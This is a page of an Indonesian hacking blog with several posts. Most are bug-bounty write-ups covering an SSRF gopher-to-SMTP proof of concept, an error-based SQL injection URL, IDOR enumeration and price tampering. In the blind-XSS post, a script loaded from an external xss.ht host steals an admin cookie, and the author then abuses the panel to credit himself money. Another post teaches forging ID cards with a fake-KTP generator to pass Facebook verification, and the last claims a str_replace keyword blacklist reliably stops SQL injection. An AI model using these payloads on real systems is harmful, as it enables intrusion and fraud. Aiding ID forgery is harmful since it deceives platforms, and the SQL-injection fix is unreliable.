Server Dibobol Hacker ! Ratusan Ribu Akun Mobile Legends Berpotensi Dihack !

Server Dibobol Hacker ! Ratusan Ribu Akun Mobile Legends Berpotensi Dihack !

Halo Sobat Semua, Pada Artikel kali ini saya membawakan Breaking News Tentang Cyber Security nih. Mohon maaf bila saya jarang sekali Post Tentang hacking lagi karena saya Bingung mau ngetik apa. Nah kebetulan nih ada Berita Hangat, Simak Berikut ini. btw Teman saya ( Tepatnya abang abangan ) Kemarin malam Merasa akunnuya dipakai orang, padahal beliau tidak terkena phising sama sekali, beliau diajak ngechat sama si hacker panjang lebar, ternyata oh ternyata seperti ini alur hack nya.

Pada Tanggal 12 Oktober 2019 Pukul 7 Malam, Seorang hacker Berinisial Y**i K*******A (Nama Saya Samarkan) membuat Postingan / Status di wall Facebook beliau, Disana dijelaskan Dia berhasil Meretas Server Moonton sehingga dia berhasil mendapatkan Ratusan Ribu Akun Mobile Legends Siap Pakai. Dia Mengupload dan Mencoba menjual List akun tersebut ke Teman Facebooknya. Dalam waktu 5 jam Postingan beliau sudah dibagikan Lebih dari 200x oleh warganet facebook.

Ngomongin Peretasnya nih, Saya kasih clue nih Beliau merupakan Pembuat sekaligus Penjual Cheat Game Android Khusus nya Mobile Legends sejak tahun 2018 loh, Dengan Berbekal skill Coding, Reverse Enginnering, Recon, Pentesting Beliau Berhasil meretas Sistem Moonton. Tidak hanya itu, dia sudah diakui di Website Platinmods Semagai Cheat Maker nya.

Data yang didapatkan sang hacker merupakan Informasi sensitive mengenai Akun Player mobile legends, disana tertera beliau mendapatkan Login key, Nick name, server id, device id, dll. Dengan menggunakan info tersebut hanya tinggal mengedit file di folder root sehingga kita bisa memainkan akun tersebut.

Jangan salah ! Hacker ini ternyata sudah menemukan celah ini sejak lama, Dia pun sudah melaporkannya ke pihak Moonton, namun sesuai aturan Ethical Hacker bilamana tidak ada respon dari vendor atau perusahaan terkait selama 60 hari ( kurang lebih ) Hacker berhak MeRelease 0Day Security ke public, sama halnya seperti Bug vBulletin yang sempat trending beberapa minggu lalu.

Oleh karena itu, segera lah lakukan Pengamanan akun seperti Mencoba Login Logout akun, karena kemungkinan session / login key nya akan berubah sehingga dia tidak bisa mengaksesnya.

Cukup Sekian Artikel kali ini mohon maaf kalau belepotan intinya ini tuh masih fresh banget ya gays, makasih loh e.

Read more

Gain Adfly SMTP Access with SSRF via Gopher protocol

Support saya dengan kl1ck 1kl4n guys

Adfly Gain SMTP Access with SSRF via Gopher protocol
Halo Sobat Rafli Hax0r, pada artikel sebelumnya saya menemukan celah IDOR di ADFLY dan dihadiahi sebesar $100. Nah pada postingan kali ini saya mau share Penemuan saya diadfly ini sekitar 3 hari yang lalu, Bug ini merupakan bug SSRF yang severity nya lumayan tinggi. Btw Bug ini udh di fix ya jadi jangan dicoba gk bakal work ;v.

Kemungkinan besar bug ini terdapat di setiap url shortener yang mempunyai SMTP dan yg pastinya ngefetch data dari web tersebut. Oke lanjut kecerita, Awalnya saya gabut sampai saya kepikiran untuk nyari di adfly. Setelah 20 menit mencari dan tidak ketemu, saya berbicara dalam hati "wah kayaknya ni jika kita mau ngeshort url si adfly ngefetch Title dari web tersebut, munkin aja ini vuln SSRF".
Setelah itu saya pun mencoba memasukan protocol Gopher:// ternyata gagal alias ada filter dari adflynya.

Awalnya saya menggunakan Payload FASTCGI untuk RCE di Gopherus, namun tidak work karena adfly hanya mengambil TITLE web saja. saya Pun menggunakan payload SMTP menggunakan tool Gopherus Dan menggabungkannya kedalam script PHP yang akan saya upload ke hosting milik saya. code :

<?php
header('location: gopher://127.0.0.1:25/_MAIL%20FROM:adf%40ly%0ARCPT%20To:myemailhaha%40gmail.com%0ADATA%0AFrom:adf%40ly%0ASubject:Test%0AMessage:test%0A.');
?>

Saya upload ke server dengan nama poc.php, btw ini buat ngebypass filter karena adfly hanya mengizinkan protocol http / https.

Setelah itu saya coba short http://serversaya.com/poc.php ke adfly, selang beberapa menit email dari adf@ly.adf.ly masuk ke email saya ( Seperti di SS berikut ).

Saya pun melaporkannya ke adfly, selang beberapa jam bug saya di terima adfly meminta bukti Original email dari saya, saya pun memberikannya. baru lah satu hari semenjak saya melapor bug tersebut diperbaiki, untuk masalah hadiah saya belum tau kapan tapi berdasarkan pengalaman saya baru dikasih 2 bulan setelah lapor.

Timeline :

- Minggu 23 Juni 2019 23:35 WIB = Bug Found & Reported

- Senin 24 Juni 2019 17:16 WIB = Triaged

- Senin 24 Juni 2019 22:34 WIB = Bug Fixed

Terimakasih sudah membaca writeup saya kali ini, maaf kalo berantakan hehe.

Read more

Dapet THR berkat Simple But Dengerous Bug [BugBounty - SQL injection ]

BugBounty - SQL injection - Halo sobat, pada kesempatan kali ini saya mau share nih pengalaman saya dapat THR dari satu adnetwork bernama Badhits. jadi waktu itu saya sedang buka group IndoXploit, disana bug hunter bernama noobsec menyarankan saya untuk mencari target adsnetwork di website adswiki.net. jadi saya pun mencari disitu, langsung saja saya filter berdasarkan bintang. Kebetulan badhits ini bintangnya 5 dan saya pun tertuju untuk melakukan pentest di web tersebut.

Setelah itu saya membuka web badhits.com dan disana hanya terdapat form login tanpa form register, ternyata badhits sendiri hanya membuka registrasi bagi yang menggunakan kode referal. contohnya refferal code milik saya Disini. Nah disini saya penasaran sama request get dari accesskey= apakah bisa / possible buat di sqli ? awalnya saya berfikir "ah gk mungkin ini vuln" karena udh sering saya mencoba test sqli di url refferal tapi hasilnya zonk.

Setelah itu saya akhirnya mencoba menambahkan Quote setelah accesskey=[idreferral].

https://badhits.com/register.php?accesskey=YHR5AGySRb'

Ternyata response nya "mysql error". dalam hati saya berfikir " wah vuln nih boleh juga.

akhirnya saya mencoba metode union based. ternyata saat mencari magic number tidak keluar alias error.

lalu saya mencoba metode Xpath Injection (Extractvalue) dan akhirnya bisa boise.

Setelah itu saya mencoba mendump 1 user sebagai bukti yaitu akun si admin badhits. ternyata passwordnya di hash, saya tidak tau itu hash jenis apa. akhirnya saya menemukan table pwreset yg ternyata berisi code untuk mereset password akun.
Dikarenakan metode extractvalue memiliki limit dalam mengeluarkan output, saya cari metode lain.
Saya pun gunakan Double Query Error Based SQL injection. jadi seperti ini :

https://badhits.com/register.php?accesskey=-YHR5AGySRb' and SELECT 1 AND(SELECT 1 FROM(SELECT COUNT(*),concat(0x3a,(QUERY SQL LIMIT 0,1),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)%23

Saya pun mendapatkan akun admin, dan langsung melaporkan ke pihak admin.
Saya tanyakan apakah dia punya bug bounty program , cs nya pun menjawab :

Langsung saja setelah itu saya laporkan ke email tersebut. Satu jam setelah saya melaporkan hal tersebut, pihak badhits menindaklanjuti bug tersebut. 30 menit kemudian bug tersebut sudah diperbaiki.

Video Poc :

Setelah itu saya dikirim $65, walaupun kecil yang penting bisa buat beli baju lebaran hehehe.

Timeline :

19 Mei 2019 22:10 = Bug Reported

19 Mei 2019 23:38 = Triaged
20 Mei 2019 00:09 = Bug Fixed & Ask for payments
24 Mei 2019 00:08 = $65 send to amy paypal :D

Thx guys. 

 

Read more

[BUGBOUNTY] Able to see everyone original url on ADFLY

Rafli hax0r - Pada Kesempatan kali ini saya mau membagikan temuan saya lagi nih. sebenarnya ini sudah saya temukan 3 minggu lalu, saya juga sudah membuatkan video write up di youtube, nah sekarang saya mau buat versi blog nya nih. sebelumnya kalian tau ga sih apa itu adfly ? yuk simak dulu.

Apa itu adfly ?
     Adfly adalah salah satu ads network terbesar yang ada diinternet, khususnya dalam urusan "URL shortener" . adfly sendiri banyak dipilih orang karena alasan withdraw mudah dan minimum saldonya rendah serta sudah terpercaya sejak lama.

nah sudah tau kan ? Yuk cekidot kita bahas masalah bugnya.

Saat itu saya sedang boring, kemudian pikiran saya tertuju kepada adfly karena ingin ngecek saldo saya di adfly. Setelah itu saya kepikiran "Ini kan website penghasil uang, bagaimana kalau saya cari bug disini, siapa tau dia ada sedikit hadiah buat saya ;v" langsung deh saya nyari selama 20 menit, sambil membuka Fiddler 4 . Tidak lama kemudian saya mendapatkan 2 bug sekaligus. namun yang saya laporkan hanya satu yakni Broken Access Control.

How To Reproduce :
1. Open https://adf.ly/publisher/getLink?token=&id=
2. Wajib Login terlebih dahulu.
3. Pergi ke intruder ( brute forcer ) submit ke param id dari 1 - 1000
4. Maka Kita bisa tau Original url dari shortened url tersebut.

Video PoC :
`

Setelah itu saya melaporkan keadmin.  2 hari setelah report saya mendapat tanggapan dan dijanjikan hadiah. tapi hingga sekarang hadiah tersebut masih khayalan semata :(. Baiklah terimakasih sudah berkunjung semoga kalian sehat selalu amin ya rabb. semoga Bulan Puasa kali ini penuh berkah.

Timeline :
27 April 2019 = Reported This Bug
29 April 2019 = Triaged, after +- 10 minutes Bug Fixed (Dijanjikan Hadiah)
Update : Sudah Dikasih Reward berupa $100

Read more

Ngintip Admin panel Website Followers berujung Keberuntungan

Blind XSS vulnerability

Rafli Hax0r - Halo kembali lagi di rafli hax0r kali ini saya mau cerita cerita pengalaman saya dapat uang jajan dari website jual beli followers . Saya nemuin ini saat saya sedang gabut / bosen dirumah :'v kebetulan ada teman facebook yang menjual akun vip-member.id . Setelah itu terlintas dipikiran saya "Kenapa engga coba pentest aja ? Biasanya Web followers kek gini securitynya engga terlalu dipentingin" karena kebetulan ini web cukup terkenal ( followers murah + cepat, mau beli ? kontak saya hehe :'v ).

Setelah itu saya pun nyari nyari di web tersebut selama sekitar 15 menit engga ketemu temu . nah saya terlintas kenapa engga cari subdomain / domain lain yang satu owner sama ini web ? saya pun mencari cari dan ternyata nemu domain kodokoalamedia.co.id.

Saya pun jalan jalan diwebsite tersebut selama kurang lebih 20 menit. Sampai saya menemukan form Pemesanan, disana terdapat kolom nama, nomor, pesan dan produk yang dipesan. nah disitu terlintas dalam fikiran saya (Negative Think) wah bagaimana kalo masukin payload xss trus masuk sebagai admin lalu memproses pembayaran saya :'v saya pun bergegas membuka xsshunter.com lalu mengambil payload :

"><script src=https://l33t1337(.)xss.ht></script>

Dan memasukkannya di kolom nama serta pesan. Karena kebetulan waktu itu malam malam saya berfikir ah mungkin adminnya lagi tidur, tunggu besok saja lah. Esok harinya saya melihat xsshunter lagi dan ternyata benar saja adminnya membuka panel dan xss saya fired. Ketika saya mengambil cookienya sudah expired saya pun mencoba kembali "Pura Pura Pesan" dan pada akhirnya setelah nunggu 30 menit si admin login kembali :'v saya pun dapat cookienya. Seketika saya bisa masuk admin panel.. disana saya menambahkan diri saya sebagai reseller tanpa harus bayar + karena minimum member vip-member.id adalah 1jt saya langsung bisa daftar tanpa uang 1jt, saya pun menambahkan saldo saya menjadi 5jt. disitu saya merasa SENANG sekali guys :'v karena saldo saya 5jt. Saya sudah sempat ingin menjual akun tersebut kemedia sosial, namun....

Setelah ngegabut dipanel admin saya melihat "History Login Admin.txt" didalam panel, karena tidak bisa diedit saya pun panik karena IP saya sudah ada disitu. SAya pun mencari dimedsos seputar pemilik web tersebut, Benar saja ternyata Pemilik web tersebut memiliki 16 teman yang sama seperti saya , Dia juga membuka program bug bounty bagi yang menemukan bug akan di berikan hadiah 1jt. Ketika itu juga saya pun bergegas menkontak adminnya via wa karena difacebook tidak aktif , namun si admin yang megang wa itu bukan developer / ownernya melainkan hanya pekerja saja so saya nunggu aja deh. Eh Ternyata ownernya ngebales pesan saya dia pun Bertanya tanya seputar bug tersebut .seketika dia bilang " Sini ATM kamu, biar semangat saya kasih DP nya dulu" lalu dalam hati saya berkata "Njir ini admin tumben pengertian :'v" yowes saya kirim aja deh rekening ovo ku.

Dia pun mengirim uang sejumlah Rpx.xxx.000 NAMUN itu bukan keseluruhan hadiah karena dia bilang " Ini buat buka puasa ntar, nanti ada lagi buat sahur+buka puasa setelah bug ini saya perbaiki" . Saya nambah semangat nih :'v saya pun berkata dalam hati "Duh ini gede menurutku untuk kategori xss di website lokal, tokopedia, bukalapak dan kawan kawan pun sepertinya lebih kecil dari ini". Ternyata usut punya usul si admin web ngasih 1jt (DP) karena ane berhasil masuk ke admin panel. Nah abis buka puasa si admin selesai memperbaiki saya pun dikirim lagi sebesar Rpx.xxx.000 + Saldo panel 500.000 , saya pun merasa bersukur karena hal itu dan akhirnya duitku kukasih emak buat makan makan bareng keluarga .

Reward Berupa uang :

Reward Saldo Panel :

Itulah pengalaman saya, untungnya saya tidak mengacak ngacak web tersebut dan mendapat hal yang lebih baik karena meninggalkan kejahatan. Btw adminnya dapet heker jahat yang ngebobol tu web, pengen di tindak lanjuti :'v. untung saya engga hehe.

TimeLine :

- Jum'at 11 maret 2019 = Bug Found & First Report
- Sabtu 12 Maret 2019 14:30 = Triaged by their team & Gave me $$$ [1st Reward]

- Sabtu 12 mei 2019 21:30 = Bug Fixed & 2nd Reward Given to me

Cepet banget guys :'v

-Rafli Pasya ( ./z3rb0a / lov3code )

Read more

Terlalu cinta Twice, seorang hacker meretas website Humas Polri

Terlalu cinta Twice, seorang hacker meretas website Humas Polri

         Setelah 4 hari yang lalu Twice merilis lagu baru yang berjudul "Fancy" ternyata ada fans dari indonesia yang mencurahkan isi hatinya di website Divisi Humas Polri. Website tersebut diketahui sudah diretas beberapa jam yang lalu oleh hacker yang mengatasnamakan timnya " FAC (Inisial)" entah apakah dia seorang wibu atau hanyalah pecinta cewe korea.

     Saya pun sempat kaget "WOW!" gila ya goaid dihack sama dia. usut punya usul ternyata dia mensoceng email PID Divisi Humas Polri dengan mengirim email atas nama personil / Pegawai Website tersebut. Di dalamnya hanya berisi :

Saya Cinta Twice

       Dari kejadian ini kita bisa mengambil pelajaran bahwa jangan lupa untuk mengecek dari mana email tersebut terkirim. karena hacker tidak hanya beraksi lewat dunia cyber security, tapi bisa saja Social Enginnering. Olehkarena itu Pihak pihak Cusotomer Service wajib waspada bila ada kejadian serupa.

      Sampai Artikel ini ditulis belum ada perbaikan dari website tersebut karena ini baru 30 menit setelah saya mendapatkan informasi dari hacker tersebut.

Link : https://humas.polri.go.id/download/saya-cinta-twice/

     Sekian Berita yang saya bagikan semoga bermanfaat. Sampai lupa di next artikel.

Read more

IDOR or Parameter Tampering was able me to pay less than they should

IDOR or Parameter Tampering was able me to pay less than they should

[ Indonesia ]

 Halo Selamat datang diwebsite saya, kali ini saya akan berbagi pengalaman saya menemukan Bug Parameter Tampering di sebuah website yang memiliki program bug bounty. sayangnya bug yang saya temukan ini duplicate dan belum dipatch sehingga saya akan mensensor website tersebut. baiklah mari baca awal mula saya menemukan bug ini.

 The Stories

Saya sedang bermain game pada waktu itu, sampai saya bosen karena koneksi nya lemot. Akhirnya saya memutuskan untuk keluar game, dan saya seperti biasa nonton youtube dengerin lagu, typerace sama anas anas. Dan saya bicara dalam hati “Duh bosen nih, Iseng ah cari cari bug kali aja nemu hehehe”. Okelah setelah itu saya tertuju ke salah satu platform bug bounty dan interested dengan suatu program yang ada disana.

 Setelah 20 Menit mencari saya menemukan Celah yang membuat saya bisa membeli salah satu item yang ada di suatu PAKET ITEM. Tapi setelah saya cek lebih dalam hanya work pada paket yang isinya free. Saya bingung, paket item tersebut seharga 20ribu tapi setelah dibypass saya tidak perlu bayar dan dibawa kehalaman pemilihan item, dan boom item tersebut jadi gratis, lalu saya mencobanya dan berhasil. saat itu saya sudah mau menulis laporan tapi karena saya masih penasaran, saya pun mencoba paket lain. Ternyata jika item didalam paket tersebut masih bayar kita tidak bisa memakainya. jadi saya menyimpulkan wah ini mah bugnya hanya “Membeli item secara satuan dengan parameter tampering” sehingga saya ragu. tapi dalam benak saya “Wah ini kayanya bug nya bagus deh soalnya dia gk bisa beli satuan, tapi kalo di bypass dia bisa beli”. Ane pun seneng tuh, Eh saat ane dorking di google ternyata paketan satuan tersebut bisa didorking. Saya langsung sedih karena gagal senang :’V. 

 Saya sempet Istirahat sekitar 15 menitan trus saya mendapat wahyu “Oh iya kenapa engga Coba parameter Top Up ?”

Saat itu saya menemukan Parameter seperti ini :

 http://mytarget.com/payment.php?id=[IDPEMESANAN]&nm=[redacted]500000&hg=[vulnparameter]&nama=[urname]&tlp=213123&mail=[mail]&dom=[notimportant]&ex=[lulz]&tipe=2

Saya pun merubah parameter hg dengan nominal 1000 karena jika nominalnya 0 server nya menolak. Dan setelah saya forward dia berhasil, saya pun mulai tertawa sendiri dan seneng banget coy.

Disitu tertulis total yang harus dibayar hanya 1000 dan itemnya seharga 500000. tapi disitu tertulis tidak ada metode pembayaran yang tersedia akhirnya parameter tipe= saya ganti dari 2 jadi 1. disitu tersedia pembayaran via bank. saya pun langsung membayarnya dan Pembayaran sukses :)

Saya Pun membuat laporan dan melaporkannya ke Pihak mereka. Setelah seminggu menunggu ternyata Laporannya dianggap Duplicate dengan severity HIGH. 

Cukup sekian itu aja yang bisa saya bagikan, have a nice day :D

Timeline :
14 April = Found & Reported to their team
22 April = Accepted as Duplicate
Severity : High
Rewarded : SWAG as appreciation

English Language at my medium story @androgaming1912

Read more

Cara Mengatasi Konfirmasi Identitas agar Facebook Bisa di buka Kembali

Cara Mengatasi Konfirmasi Identitas agar Facebook Bisa di buka Kembali

Halo kawan kawan Rafli Hax0r kembali lagi bersama saya nih di website ini. Pada Kesempatan kali ini tepatnya besok adalah hari kedua saya ulangan ( Matematika coy ) saya mendapatkan ide untuk update blog ini. oleh karena itu kalian pasti butuhkan tutornya ? oke simak ya..

Konfirmasi Identitas Account Facebook biasanya terjadi ketika anda memposting hal berbau spam seperti gore, sara, dan pelecehan seksual serta pornografi. Jika sudah seperti ini anda biasanya dimintai Foto KTP ataupun identitas diri seperti KTP, SIM, dll. Nah kalian kan kaum milenial biasanya gk mau kan KTP nya kesebar / ribet nyari nyari KTP ? Nah saya ada solusinya nih simak baik baik yah.

Tutorial :

1. Buka Link FakeKTP terbaru : Disini
2. Nah Kalian isi deh tuh, kalau bisa nama di ktp disesuain sama nama FB nya ya agar mudah nantinya..
3.  Tunggu 1x24 Jam maka akun akan terbuka
   

Oke Itu aja untuk artikel kali ini, ini simple banget btw. Oh iya bagi kalian yang mau change name FB tanpa nunggu 60 hari bisa kunjungi artikel sebelumnya : Disini ( FakeKTP pakai link terbaru ) Semoga Bermanfaat sampai jumpa di lain artikel :)

Read more

Cara Rahasia Diterima Google Adsense Dengan Cepat, Cuma 2 hari !

 Cara Rahasia Diterima Google Adsense Dengan CepatCuma 2 hari !

     Tips Rahasia Diterima Google dengan cepat sebenarnya mudah, hanya saja butuh kesabaran ketelitian dan keuletan agar diterima. Nah Dipostingan kali ini semoga kalian bisa mengerti dan langsung diterima setelah membaca postingan ini. Tapi Pertama tama kalian disunnahkan untuk kl1k 1kl4n nya terlebih dahulu agar saya semangat ngeblog. Sebelum kalian tau apa tips and trick diterima adsense dengan mudah kalian harus tau dulu apa itu Google Adsense, siapa tau ada salah satu dari kalian yang belum mengerti.

     Google Adsense adalah program kerjasama periklanan melalui media Internet yang diselenggarakan oleh Google. Melalui program periklanan AdSense, pemilik situs web atau blog yang telah mendaftar dan disetujui keanggotaannya diperbolehkan memasang unit iklan yang bentuk dan materinya telah ditentukan oleh Google di halaman web mereka. Pemilik situs web atau blog akan mendapatkan pemasukan berupa pembagian keuntungan dari Google untuk setiap iklan yang diklik oleh pengunjung situs, yang dikenal sebagai sistem pay per click (ppc) atau bayar per klik.

Nah Kalian sudah tau kan ? Langsung aja nih saya akan kasih tau tips nya

1. Blog Tidak berisi hal-hal yang dilarang oleh google
   Google sudah tegas jika kalian mengandung unsur unsur yang berbau jahat pasti bakal dibanned / tidak memenuhi aturan. Yang "jahat" tapi diperbolehkan : mod;phising;deface;hacking.
   Contoh Terlarang : Crack, Film bajakan, Judi, Porno, dan musik copyright
2. Membuat halaman pendukung
   seperti : About Us, Contact Us, Disclaimer, dan Privacy Policy. Halaman pendukung ini sangat penting karena google selalu ingin agar tidak ada halaman kosong / rusak di website / blog pengiklan.
3. Template Responsive
   Template yang Responsive disenangi oleh google karena template yang responsive pasti membuat Visitor senang dengan pengalamannya berkunjung keblog tersebut. otomatis iklan juga akan tayang dengan benar dan pasti banyak klik.
4. Konsisten Mengupdate Artikel
   Google juga manusia, siapa pun yang caper ke dia pasti akan dituruti permintaannya. Sama halnya dengan daftar adsense, jika ingin cepat diterima kalian harus sering sering update artikel sebelum request ke Adsense, baru setelah keterima terserah anda.
5. Artikel Panjang, Jelas dan Detail
   Artikel yang bagus ia lah artikel yang memiliki lebih dari 300 karakter agar memerlukan waktu membacanya. Jika Visitor Membaca Terlebih dahulu maka jika diterima adsense maka visitor dapat melihat iklan dengan jelas dan mungkin saja tertarik lalu mengklik iklan tersebut.

Nah Tadi itu beberapa tips and trik Keterima Adsense, Tidak percaya ? Loh buktinya adsense saya ini keterima cuma 2 hari coy bayangin ! gimanna gk gampang tuh. Oke deh cukup sampai disini ya, sayanya juga sudah lelah ngetik ini sampai jumpa dipostingan berikutnya ya byebye :*

Read more

Fix / Patch Bug SQL injection [ Protect Website From Hacker ]

Fix / Patch Bug SQL injection [ Protect Website From Hacker ]

Halo sobat rafli haxor, pada kesempataan kali ini saya mau share cara fix Bug SQL Injection di Website mu. Tips and trick ini sudah 100% teruji oleh saya dan saya jamin tahan sql injection. tapi sebelum itu kalian harus tahu dulu apa itu sql injection.

SQL Injection

A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

Source : OWASP

Nah sekarang kalian sudah tahukan apa itu sql injection, sudah pasti ini sangat berbahaya karena masuk top 10 Vulnerability di OAWSP hingga sekarang.

How To Patch

Kalian pasti ingin memperbaikinya kan ? ya pasti lah makanya kalian berkunjung ke blog ini kan ? wkawak.

1. Buka File yang melakukan Get / Post terhadap database,,, misal.
$id = $_GET['id'];
kalo url bakal seperti ini : .php?id=[id]
2. Kita Lakukan Filter di kode tersebut dengan menggunakan fungsi str_replace seperti ini.

$iso = $_GET['id'];$filter = array('concat', 'make_set', 'export_set', '!', 'null', 'and', 'false', 'true', 'sleep', 'or', 'select', 'extractvalue', 'from', 'dual', '-', '+'. '', '%23', '%27', 'by', 'select', 'union', 'order', '(', ')');$replace = "";$id = str_replace($filter, $replace, $iso);

*Jika Terdapat error pada $replace anda bisa menggunakan array seperti ini :$replace = array('', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '');

3. Save Filenya
4. Test di server anda seharusnya sudah terprotect dari sql injection (blind, extrackvalue, union based, error based)

Terimakasih telah berkunjung kewebsite saya, saya harap kalian senang dan jangan sungkan sungkan untuk berkunjung kewebsite saya lagi.
BTW : Maafkan bila 1klan nya numpuk ea.

Tags : Perbaiki sql injection, fix sql injection, bypass sql injection, sql injection, cara fix sql injection, fix bug sql injection, patch sql injection, patching sql injection

Read more